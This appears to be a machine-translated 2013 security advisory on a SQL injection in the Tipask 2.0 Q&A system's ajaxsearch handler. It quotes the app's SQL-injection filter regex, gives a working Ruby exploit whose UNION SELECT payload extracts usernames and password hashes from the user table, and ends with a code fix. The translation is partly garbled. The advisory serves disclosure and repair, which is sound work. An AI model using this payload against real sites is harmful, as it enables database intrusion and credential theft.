tipask quiz system 2. 0 ajaxsearch secondary code injection vulnerability and fix-vulnerability warning-the black bar safety net

2013-09-11T00:00:00
ID MYHACK58:62201340519
Type myhack58
Reporter seay
Modified 2013-09-11T00:00:00

Description

Tipask quiz system is an open source PHP imitation Baidu know the program. To the Chinese use habit of the design concept, the use of the MVC framework, the system has a fast speed, SEO-friendly, the interface operation is clean and clear and other characteristics.

But Tipask in the presence of the secondary encoding issues, and so lead to bypass the filtration system caused by the injection.

在 程序 入口 /model/tipask.class.php init_request ():

$this->get = taddslashes($this-> get, 1); $this-> post = taddslashes(array_merge($_GET, $_POST)); checkattack($this-> post, 'post' ); checkattack($this-> get, 'get' );

The get and post parameters of the addslashes, after a checkattack check:

function checkattack($reqarr, $reqtype= 'post') { $filtertable = array ( 'get' => '\'|(and|or)\b.+? (>|<|=|in|like)|\/\. +?\\/|<\ sscript\b|\bEXEC\b|UNION.+? SELECT|UPDATE. +? SET|INSERT\s+INTO.+? VALUES|(SELECT|DELETE).+? FROM| (CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)' , 'post' => '\b(and|or)\b. {1,6}? (=|>|<|\bin\b|\blike\b)|\/\. +?\\/|<\ s\b|\bEXEC\b|UNION.+? SELECT|UPDATE.+? SET|INSERT\ s+INTO.+? VALUES|(SELECT|DELETE).+? FROM|(CREATE|ALTER|DROP|TRUNCATE)\ s+(TABLE|DATABASE)' , 'cookie' => '\b(and|or)\b. {1,6}? (=|>| <|\bin\b|\blike\b)|\/\.+?\\/|<\ sscript\b|\bEXEC\ \b|UNION.+? SELECT|UPDATE.+? SET|INSERT\s+INTO.+? VALUES| (SELECT|DELETE).+? FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+ (TABLE|DATABASE)' ); foreach ($reqarr as $reqkey => $reqvalue) { if (preg_match("/" . $filtertable[$reqtype] . "/is", $reqvalue) == 1) { print('Illegal operation!' ); exit(-1); } } }

This check is mainly forSQL injection, a match is found the rule will exit

现在 看 漏洞 处 /control/question.php onajaxsearch function:

/ Question automatic search has to solve the problem / function onajaxsearch () { $title = urldecode($this-> get[2]); $questionlist = $_ENV[ 'question']->search_title($title, 2, 1, 0, 5); include template('ajaxsearch' ); }

To get the second parameter of the urldecode directly after the incoming SQL statement, bypassing the front filter and check that the LEDSQL injection.

require "net/http" require "uri" def urlencode(exp) str = ""; exp. each_char { |c| str << sprintf("%%%x", c. ord) } return str end def request(method, url) if method. eql? ("get") uri = URI. parse(url) http = Net::HTTP. the new(uri. host, uri. port) response = http. request(Net::HTTP::Get. the new(uri. request_uri)) return response end end doc =<<HERE------------------------------------------------------- Tipask 2.0 Inejction Exploit Author:ztz Blog:http://ztz. fuzzexp. org/ ------------------------------------------------------- HERE

usage =<<HERE Usage: ruby #{$0} host port path example: ruby #{$0} help.tipask.com 8 0 / HERE

puts doc if ARGV. length < 3 puts usage else $host = ARGV[0] $port = ARGV[1] $path = ARGV[2] puts "[*]send request..." url = "http://#{$host}:#{$port}#{$path}? question/ajaxsearch/" exp = urlencode("' UNION SELECT 1,2,3,4,5,6,7,8,concat(username,char(0x3d),password),1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1 from ask_user#") response = request ('get', url<<exp) result = response. body. scan(/\w+=\w{3 2}/) puts result end

!

Repair solutions:

function onajaxsearch () { $title = $this-> get[2]; $questionlist = $_ENV[ 'question']->search_title($title, 2, 1, 0, 5); include template('ajaxsearch' ); }

Author: pig child